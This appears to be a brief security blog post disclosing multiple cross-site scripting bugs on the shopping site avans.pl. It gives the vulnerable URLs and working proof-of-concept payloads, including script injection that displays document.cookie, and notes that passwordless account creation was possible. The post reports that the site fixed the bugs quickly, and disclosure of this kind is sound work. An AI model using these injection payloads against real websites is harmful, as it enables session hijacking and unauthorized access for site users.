Multiple XSS in Avans.pl

Simple reflected XSS bug in Avans’ search box:

http://www.avans.pl/produkty.html?query=XSS"/><script>alert('XSS')</script>

Another set of unfiltered input fields was in:

https://www.avans.pl/koszyk-logowanie.html

which is a Step 3/4 after adding a product to the cart. Filling those fields with a standard value of:

"/><script>alert(document.cookie)</script>

redirects to the:

https://www.avans.pl/koszyk-adres.html

which pops an alert box.

Bonus: It was possible to create an account without a password.

Bugs’ lifespans were short, because of a quick Avans.pl reaction. Good job.

Leave a Reply

Your email address will not be published. Required fields are marked *